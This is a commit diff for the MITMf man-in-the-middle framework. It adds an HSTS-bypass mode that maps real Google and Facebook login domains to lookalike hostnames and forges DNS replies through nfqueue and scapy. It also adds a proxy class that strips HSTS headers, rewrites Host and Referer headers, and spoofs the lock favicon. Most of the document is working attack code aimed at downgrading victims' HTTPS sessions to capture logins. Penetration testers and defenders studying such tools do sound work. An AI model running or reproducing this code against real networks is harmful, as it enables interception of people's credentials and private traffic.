added HSTS bypass as demonstrated by Leonardo Nve at blackhat

config_files/hsts_bypass.cfg

@@ -0,0 +1,7 @@
+#here you can configure your domains to bypass HSTS on
+#the format is real.domain.com = fake.domain.com
+
+accounts.google.com = account.google.com
+mail.google.com = gmail.google.com
+www.facebook.com = social.facebook.com
+accounts.google.se = cuentas.google.se

mitmf.py

@@ -3,8 +3,6 @@
 from twisted.web import http
 from twisted.internet import reactor
 
-from sslstrip.StrippingProxy import StrippingProxy
-from sslstrip.URLMonitor import URLMonitor
 from sslstrip.CookieCleaner import CookieCleaner
 from sslstrip.ProxyPlugins import ProxyPlugins
 
@@ -15,7 +13,7 @@
 from plugins import *
 plugin_classes = plugin.Plugin.__subclasses__()
 
-mitmf_version = "0.6"
+mitmf_version = "0.7"
 sslstrip_version = "0.9"
 sergio_version = "0.2.1"
 
@@ -34,6 +32,7 @@
     sgroup.add_argument("-f", "--favicon", action="store_true", help="Substitute a lock favicon on secure requests.")
     sgroup.add_argument("-k", "--killsessions", action="store_true", help="Kill sessions in progress.")
     sgroup.add_argument('-d', '--disable-proxy', dest='disproxy', action='store_true', default=False, help='Disable the SSLstrip Proxy')
+    sgroup.add_argument("-b", "--bypass-hsts", dest='hsts', action="store_true", help="Enable HSTS bypass")
 
     #Initialize plugins
     plugins = []
@@ -69,7 +68,7 @@
     load = []
     try:
         for p in plugins:
-            if  getattr(args,p.optname):
+            if  getattr(args, p.optname):
                 p.initialize(args)
                 load.append(p)
     except NotImplementedError:
@@ -78,8 +77,28 @@
     #Plugins are ready to go, start MITMf
     if args.disproxy:
         ProxyPlugins.getInstance().setPlugins(load)
-        reactor.run()
+
+    elif args.hsts:
+        from sslstrip.StrippingProxyHSTS import StrippingProxy
+        from sslstrip.URLMonitorHSTS import URLMonitor
+
+        URLMonitor.getInstance().setFaviconSpoofing(args.favicon)
+        CookieCleaner.getInstance().setEnabled(args.killsessions)
+        ProxyPlugins.getInstance().setPlugins(load)
+
+        strippingFactory              = http.HTTPFactory(timeout=10)
+        strippingFactory.protocol     = StrippingProxy
+
+        reactor.listenTCP(args.listen, strippingFactory)
+
+        print "\n[*] sslstrip v%s by Moxie Marlinspike running..." % sslstrip_version
+        print "[*] sslstrip+ by Leonardo Nve running..."
+        print "[*] sergio-proxy v%s online" % sergio_version
+
     else:
+        from sslstrip.StrippingProxy import StrippingProxy
+        from sslstrip.URLMonitor import URLMonitor
+
         URLMonitor.getInstance().setFaviconSpoofing(args.favicon)
         CookieCleaner.getInstance().setEnabled(args.killsessions)
         ProxyPlugins.getInstance().setPlugins(load)
@@ -92,7 +111,7 @@
         print "\n[*] sslstrip v%s by Moxie Marlinspike running..." % sslstrip_version
         print "[*] sergio-proxy v%s online" % sergio_version
 
-        reactor.run()
+    reactor.run()
 
     #cleanup on exit
     for p in load:

plugins/Spoof.py

@@ -6,6 +6,7 @@
 from twisted.internet.interfaces import IReadDescriptor
 from plugins.plugin import Plugin
 from time import sleep
+import dns.resolver
 import nfqueue
 import logging
 logging.getLogger("scapy.runtime").setLevel(logging.ERROR)  #Gets rid of IPV6 Error when importing scapy
@@ -45,6 +46,8 @@ def initialize(self, options):
         self.target = options.target
         self.arpmode = options.arpmode
         self.port = options.listen
+        self.hsts = options.hsts
+        self.hstscfg = "./config_files/hsts_bypass.cfg"
         self.manualiptables = options.manualiptables  #added by alexander.georgiev@daloo.de
         self.debug = False
         self.send = True
@@ -91,12 +94,17 @@ def initialize(self, options):
         else:
             sys.exit("[-] Spoof plugin requires --arp, --icmp or --dhcp")
 
-        if self.dns:
+        if (self.dns or self.hsts):
             print "[*] DNS Tampering enabled"
-            self.dnscfg = ConfigObj(self.dnscfg)
+
+            if self.dns:
+                self.dnscfg = ConfigObj(self.dnscfg)
+
+            self.hstscfg = ConfigObj(self.hstscfg)
 
             if not self.manualiptables:
                 os.system('iptables -t nat -A PREROUTING -p udp --dport 53 -j NFQUEUE')
+
             self.start_dns_queue()
 
         file = open('/proc/sys/net/ipv4/ip_forward', 'w')
@@ -225,27 +233,53 @@ def build_arp_rep(self):
 
         return pkt
 
+    def resolve_domain(self, domain):
+        try:
+            answer = dns.resolver.query(domain, 'A')
+            real_ips = []
+            for rdata in answer:
+                real_ips.append(rdata.address)
+
+            if len(real_ips) > 0:
+                return real_ips[0]
+
+        except Exception:
+            logging.debug("Error resolving " + domain)
+
     def nfqueue_callback(self, i, payload):
         data = payload.get_data()
         pkt = IP(data)
         if not pkt.haslayer(DNSQR):
             payload.set_verdict(nfqueue.NF_ACCEPT)
         else:
-            if self.dnscfg:
+            if self.dns:
                 for k, v in self.dnscfg.items():
-                    if k in pkt[DNS].qd.qname:
+                    if k in pkt[DNSQR].qname:
                         self.modify_dns(payload, pkt, v)
 
-            elif self.domain in pkt[DNS].qd.qname:
-                self.modify_dns(payload, pkt, self.dnsip)
-
-    def modify_dns(self, payload, pkt, ip):
+            elif self.hsts:
+                if (pkt[DNSQR].qtype is 28 or pkt[DNSQR].qtype is 1):
+                    for k,v in self.hstscfg.items():
+                        if v == pkt[DNSQR].qname[:-1]:
+                            ip = self.resolve_domain(k)
+                            if ip:
+                                self.modify_dns(payload, pkt, ip, hsts=True)
+
+                    if 'wwww' in pkt[DNSQR].qname:
+                        ip = self.resolve_domain(pkt[DNSQR].qname[1:-1])
+                        if ip:
+                            self.modify_dns(payload, pkt, ip, hsts=True)
+
+    def modify_dns(self, payload, pkt, ip, hsts=False):
         spoofed_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) /\
                       UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) /\
                       DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd, an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=10, rdata=ip))
 
         payload.set_verdict_modified(nfqueue.NF_ACCEPT, str(spoofed_pkt), len(spoofed_pkt))
-        logging.info("%s Modified DNS packet for %s" % (pkt[IP].src, pkt[DNSQR].qname[:-1]))
+        if hsts:
+            logging.info("%s Resolving %s for HSTS bypass" % (pkt[IP].src, pkt[DNSQR].qname[:-1]))
+        else:
+            logging.info("%s Modified DNS packet for %s" % (pkt[IP].src, pkt[DNSQR].qname[:-1]))
 
     def start_dns_queue(self):
         self.q = nfqueue.queue()

sslstrip/ClientRequest.py

@@ -57,10 +57,10 @@ def cleanHeaders(self):
              headers['accept-encoding'] == 'identity'
              logging.debug("Zapped encoding")
 
-        if 'Strict-Transport-Security' in headers: #kill new hsts requests
-            del headers['Strict-Transport-Security']
-            logging.info("Zapped a HSTS request")
-        
+        if 'strict-transport-security' in headers: #kill new hsts requests
+            del headers['strict-transport-security']
+            logging.info("Zapped HSTS header")
+
         if 'if-modified-since' in headers:
             del headers['if-modified-since']
 

sslstrip/ClientRequestHSTS.py

@@ -0,0 +1,203 @@
+# Copyright (c) 2004-2009 Moxie Marlinspike
+#
+# This program is free software; you can redistribute it and/or
+# modify it under the terms of the GNU General Public License as
+# published by the Free Software Foundation; either version 3 of the
+# License, or (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful, but
+# WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+# General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
+# USA
+#
+
+import urlparse, logging, os, sys, random, re
+
+from twisted.web.http import Request
+from twisted.web.http import HTTPChannel
+from twisted.web.http import HTTPClient
+
+from twisted.internet import ssl
+from twisted.internet import defer
+from twisted.internet import reactor
+from twisted.internet.protocol import ClientFactory
+
+from ServerConnectionFactory import ServerConnectionFactory
+from ServerConnectionHSTS import ServerConnection
+from SSLServerConnectionHSTS import SSLServerConnection
+from URLMonitorHSTS import URLMonitor
+from CookieCleaner import CookieCleaner
+from DnsCache import DnsCache
+
+class ClientRequest(Request):
+
+    ''' This class represents incoming client requests and is essentially where
+    the magic begins.  Here we remove the client headers we dont like, and then
+    respond with either favicon spoofing, session denial, or proxy through HTTP
+    or SSL to the server.
+    '''    
+
+    def __init__(self, channel, queued, reactor=reactor):
+        Request.__init__(self, channel, queued)
+        self.reactor       = reactor
+        self.urlMonitor    = URLMonitor.getInstance()
+        self.cookieCleaner = CookieCleaner.getInstance()
+        self.dnsCache      = DnsCache.getInstance()
+#        self.uniqueId      = random.randint(0, 10000)
+
+    def cleanHeaders(self):
+        headers = self.getAllHeaders().copy()
+
+        if 'accept-encoding' in headers:
+            del headers['accept-encoding']
+
+        if 'referer' in headers:
+        	real = self.urlMonitor.real
+        	if len(real) > 0:
+        		dregex = re.compile("(%s)" % "|".join(map(re.escape, real.keys())))
+        		headers['referer'] = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), headers['referer'])
+
+        if 'if-modified-since' in headers:
+            del headers['if-modified-since']
+
+        if 'strict-transport-security' in headers: #kill new hsts requests
+            del headers['strict-transport-security']
+            logging.info("Zapped HSTS header")
+
+        if 'cache-control' in headers:
+            del headers['cache-control']
+
+        if 'if-none-match' in headers:
+        	del headers['if-none-match']
+
+        if 'host' in headers:
+        	host = self.urlMonitor.URLgetRealHost("%s" % headers['host'])
+        	logging.debug("Modifing HOST header: %s -> %s" % (headers['host'],host))
+        	headers['host'] = host
+        	headers['securelink'] = '1'
+        	self.setHeader('Host',host)
+
+        return headers
+
+    def getPathFromUri(self):
+        if (self.uri.find("http://") == 0):
+            index = self.uri.find('/', 7)
+            return self.uri[index:]
+
+        return self.uri
+
+
+    def getPathToLockIcon(self):
+        if os.path.exists("lock.ico"): return "lock.ico"
+
+        scriptPath = os.path.abspath(os.path.dirname(sys.argv[0]))
+        scriptPath = os.path.join(scriptPath, "../share/sslstrip/lock.ico")
+
+        if os.path.exists(scriptPath): return scriptPath
+
+        logging.warning("Error: Could not find lock.ico")
+        return "lock.ico"
+
+    def handleHostResolvedSuccess(self, address):
+        headers       = self.cleanHeaders()
+#         for header in headers:
+#         	logging.debug("HEADER %s = %s",header,headers[header])
+        logging.debug("Resolved host successfully: %s -> %s" % (self.getHeader('host').lower(), address))
+        lhost = self.getHeader("host").lower()
+        host = self.urlMonitor.URLgetRealHost("%s" % lhost)
+        client = self.getClientIP()
+        path = self.getPathFromUri()
+        self.content.seek(0, 0)
+        postData = self.content.read()
+        real = self.urlMonitor.real
+        patchDict = self.urlMonitor.patchDict
+
+        if len(real) > 0:
+        	dregex = re.compile("(%s)" % "|".join(map(re.escape, real.keys())))
+        	path = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), path)
+        	postData = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), postData)
+        	if len(patchDict)>0:
+        		dregex = re.compile("(%s)" % "|".join(map(re.escape, patchDict.keys())))
+        		postData = dregex.sub(lambda x: str(patchDict[x.string[x.start() :x.end()]]), postData)
+
+        url               = 'http://' + host + path
+        headers['content-length'] = "%d" % len(postData)
+
+        self.dnsCache.cacheResolution(host, address)
+        if (not self.cookieCleaner.isClean(self.method, client, host, headers)):
+            logging.debug("Sending expired cookies...")
+            self.sendExpiredCookies(host, path, self.cookieCleaner.getExpireHeaders(self.method, client,
+                                                                                    host, headers, path))
+        elif (self.urlMonitor.isSecureFavicon(client, path)):
+            logging.debug("Sending spoofed favicon response...")
+            self.sendSpoofedFaviconResponse()
+        elif (self.urlMonitor.isSecureLink(client, url) or ('securelink' in headers)):
+        	if 'securelink' in headers:
+        		del headers['securelink']
+        	logging.debug("LEO Sending request via SSL...(%s %s)"%(client,url))
+        	self.proxyViaSSL(address, self.method, path, postData, headers,
+                             self.urlMonitor.getSecurePort(client, url))
+        else:
+            logging.debug("LEO Sending request via HTTP...")
+            self.proxyViaHTTP(address, self.method, path, postData, headers)
+
+    def handleHostResolvedError(self, error):
+        logging.warning("Host resolution error: " + str(error))
+        try:
+            self.finish()
+        except:
+            pass
+
+    def resolveHost(self, host):
+        address = self.dnsCache.getCachedAddress(host)
+
+        if address != None:
+            logging.debug("Host cached.")
+            return defer.succeed(address)
+        else:
+            logging.debug("Host not cached.")
+            return reactor.resolve(host)
+
+    def process(self):
+    	host     = self.urlMonitor.URLgetRealHost("%s"%self.getHeader('host'))               
+        logging.debug("Resolving host: %s" % host)
+        deferred = self.resolveHost(host)
+
+        deferred.addCallback(self.handleHostResolvedSuccess)
+        deferred.addErrback(self.handleHostResolvedError)
+
+    def proxyViaHTTP(self, host, method, path, postData, headers):
+        connectionFactory          = ServerConnectionFactory(method, path, postData, headers, self)
+        connectionFactory.protocol = ServerConnection
+        self.reactor.connectTCP(host, 80, connectionFactory)
+
+    def proxyViaSSL(self, host, method, path, postData, headers, port):
+		clientContextFactory       = ssl.ClientContextFactory()
+		connectionFactory          = ServerConnectionFactory(method, path, postData, headers, self)
+		connectionFactory.protocol = SSLServerConnection
+		self.reactor.connectSSL(host, port, connectionFactory, clientContextFactory)
+
+    def sendExpiredCookies(self, host, path, expireHeaders):
+        self.setResponseCode(302, "Moved")
+        self.setHeader("Connection", "close")
+        self.setHeader("Location", "http://" + host + path)
+
+        for header in expireHeaders:
+            self.setHeader("Set-Cookie", header)
+
+        self.finish()
+
+    def sendSpoofedFaviconResponse(self):
+        icoFile = open(self.getPathToLockIcon())
+
+        self.setResponseCode(200, "OK")
+        self.setHeader("Content-type", "image/x-icon")
+        self.write(icoFile.read())
+
+        icoFile.close()
+        self.finish()